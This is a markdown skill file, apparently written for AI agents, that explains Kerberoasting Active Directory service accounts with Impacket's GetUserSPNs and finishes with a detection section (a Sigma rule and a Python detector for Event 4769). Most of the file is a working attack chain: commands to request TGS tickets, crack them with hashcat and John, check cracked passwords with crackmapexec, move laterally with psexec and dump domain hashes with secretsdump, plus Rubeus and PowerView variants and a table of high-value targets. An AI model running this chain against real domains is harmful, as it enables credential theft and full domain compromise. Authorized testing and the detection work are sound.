external/anthropic-cybersecurity-skills/skills/exploiting-kerberoasting-with-impacket/SKILL.md
Perform Kerberoasting attacks using Impacket's GetUserSPNs to extract and crack Kerberos TGS tickets for Active Directory service accounts.
Kerberoasting (MITRE ATT&CK T1558.003) is a credential access technique that targets Active Directory service accounts by requesting Kerberos TGS (Ticket Granting Service) tickets for accounts that have Service Principal Names (SPNs). The encrypted part of the service ticket is protected with a key derived from the service account's password: the NT hash for RC4-HMAC, or a PBKDF2-derived key for AES. Because any authenticated domain user can request such a ticket, the ticket can be taken offline and brute-forced against a wordlist. Impacket's GetUserSPNs.py is the standard tool for Linux-based Kerberoasting attacks.
Prerequisites: Impacket (`pip install impacket`)

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
| Technique ID | Name | Tactic |
|---|---|---|
| T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | Credential Access |
| T1087.002 | Account Discovery: Domain Account | Discovery |
| T1110.002 | Brute Force: Password Cracking | Credential Access |
```bash
# List all user accounts with SPNs (without requesting tickets)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1

# Output example:
# ServicePrincipalName          Name        MemberOf                           PasswordLastSet
# ----------------------------  ----------  ---------------------------------  -------------------
# MSSQLSvc/SQL01.corp.local     svc_sql     CN=Domain Admins,CN=Users,...      2023-01-15 10:30:22
# HTTP/web01.corp.local         svc_web     CN=Web Admins,CN=Users,...         2024-03-20 14:15:00
# HOST/backup01.corp.local      svc_backup  CN=Backup Operators,CN=Users,...   2022-06-01 08:45:10

# Request TGS tickets for all Kerberoastable accounts
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 -request

# Request a ticket for a specific account
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
    -request-user svc_sql

# Output format (hashcat-compatible); "23" is the RC4-HMAC etype,
# AES tickets are written as $krb5tgs$17$ (AES-128) or $krb5tgs$18$ (AES-256)
# $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/SQL01.corp.local*$abc123...

# Save to file for cracking
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
    -request -outputfile kerberoast_hashes.txt

# Using an NTLM hash instead of a password (Pass-the-Hash);
# -hashes takes LMHASH:NTHASH, and the LM half may be left empty
GetUserSPNs.py corp.local/jsmith -hashes :aad3b435b51404eeaad3b435b51404ee \
    -dc-ip 10.10.10.1 -request -outputfile hashes.txt

# AES-only accounts: GetUserSPNs.py has no separate AES switch. The same command
# returns an AES ticket ($krb5tgs$17$/$18$) when the account's supported
# encryption types do not allow RC4; crack those with the AES hashcat modes below.
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
    -request -outputfile hashes.txt
```
```bash
# Hashcat - RC4 encrypted tickets ($krb5tgs$23$, mode 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
    --rules-file /usr/share/hashcat/rules/best64.rule

# Hashcat - AES-256 encrypted tickets ($krb5tgs$18$, mode 19700);
# AES-128 tickets ($krb5tgs$17$) use mode 19600
hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt

# Check results
hashcat -m 13100 kerberoast_hashes.txt --show
# $krb5tgs$23$*svc_sql$CORP.LOCAL$...*$...:Summer2024!

# Verify cracked credentials
crackmapexec smb 10.10.10.1 -u svc_sql -p 'Summer2024!' -d corp.local

# Check for local admin access
crackmapexec smb 10.10.10.0/24 -u svc_sql -p 'Summer2024!' -d corp.local --local-auth

# Use credentials for lateral movement
psexec.py corp.local/svc_sql:'Summer2024!'@SQL01.corp.local

# If the service account is a Domain Admin
secretsdump.py corp.local/svc_sql:'Summer2024!'@10.10.10.1 -just-dc-ntlm
```
```powershell
# Kerberoast all accounts
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target a specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt

# Request RC4-only tickets (easier to crack)
.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

# Kerberoast with AES
.\Rubeus.exe kerberoast /aes /outfile:hashes.txt
```
```powershell
Import-Module .\PowerView.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File hashes.txt
```
High-value targets for Kerberoasting:

| Account Type | Why | Risk |
|---|---|---|
| Service accounts in Domain Admins | Direct path to domain compromise | Critical |
| SQL service accounts (MSSQLSvc) | Often have excessive privileges | High |
| Exchange service accounts | Access to all email | High |
| Accounts with AdminCount=1 | Previously/currently privileged | High |
| Accounts with old passwords | More likely to use weak passwords | Medium |
Event ID 4769 - Kerberos Service Ticket Request

- Monitor for: Encryption type 0x17 (RC4-HMAC) when AES is expected for the service account
- Monitor for: A single user requesting many TGS tickets for distinct services in a short period
- Monitor for: Service ticket requests from unusual source IPs
```yaml
title: Potential Kerberoasting Activity
status: stable
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: '0x17'   # RC4-HMAC; AES tickets are 0x11 / 0x12
  filter:
    # exclude machine accounts (names ending in $) and the krbtgt service itself
    - ServiceName|endswith: '$'
    - ServiceName: 'krbtgt'
  condition: selection and not filter
level: medium
tags:
  - attack.credential_access
  - attack.t1558.003
```
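The three monitoring checks above and the Sigma rule's exclusion logic, implemented over constructed Event ID 4769 records as an added example (not part of the skill or of Impacket); the event dictionaries, the field names, the 5-minute window, the 3-ticket threshold and the per-user IP baseline are all assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC; AES128 is 0x11, AES256 is 0x12

# Constructed sample 4769 events (not real log data); keys mirror the Security log
# fields TargetUserName, ServiceName, TicketEncryptionType and IpAddress.
EVENTS = [
    {"ts": "2024-03-20T09:00:01", "user": "jsmith", "service": "svc_sql", "etype": "0x17", "ip": "10.10.10.50"},
    {"ts": "2024-03-20T09:00:02", "user": "jsmith", "service": "svc_web", "etype": "0x17", "ip": "10.10.10.50"},
    {"ts": "2024-03-20T09:00:02", "user": "jsmith", "service": "svc_backup", "etype": "0x17", "ip": "10.10.10.50"},
    {"ts": "2024-03-20T09:00:03", "user": "jsmith", "service": "WEB01$", "etype": "0x17", "ip": "10.10.10.50"},
    {"ts": "2024-03-20T09:00:03", "user": "jsmith", "service": "krbtgt", "etype": "0x17", "ip": "10.10.10.50"},
    {"ts": "2024-03-20T09:30:00", "user": "bjones", "service": "svc_sql", "etype": "0x12", "ip": "10.10.10.51"},
    {"ts": "2024-03-20T10:15:00", "user": "bjones", "service": "svc_web", "etype": "0x12", "ip": "10.10.10.51"},
]
# Constructed baseline of the source IPs each user normally authenticates from.
BASELINE = {"jsmith": {"10.10.10.20"}, "bjones": {"10.10.10.51"}}

def is_roastable_target(service):
    """Machine accounts (name ends in $) and krbtgt are excluded, as in the Sigma filter."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def rc4_ticket_requests(events):
    """Sigma-rule equivalent: 4769 with RC4 etype for a user (non-machine) service account."""
    return [e for e in events if e["etype"] == RC4_HMAC and is_roastable_target(e["service"])]

def burst_requesters(events, window=timedelta(minutes=5), threshold=3):
    """Users requesting >= threshold distinct roastable services inside one sliding window."""
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort lexically
        if is_roastable_target(e["service"]):
            by_user[e["user"]].append((datetime.fromisoformat(e["ts"]), e["service"]))
    flagged = {}
    for user, reqs in by_user.items():
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= threshold:
                flagged[user] = sorted(services)
                break
    return flagged

def unusual_sources(events, baseline):
    """Service-ticket requests from an IP that is not in the requesting user's baseline."""
    return [e for e in events if e["ip"] not in baseline.get(e["user"], set())]

if __name__ == "__main__":
    print(len(rc4_ticket_requests(EVENTS)), burst_requesters(EVENTS), len(unusual_sources(EVENTS, BASELINE)))
```

Run over a real export, the same three functions would take the parsed 4769 fields; the thresholds should be tuned against the domain's normal ticket-request volume before alerting on them.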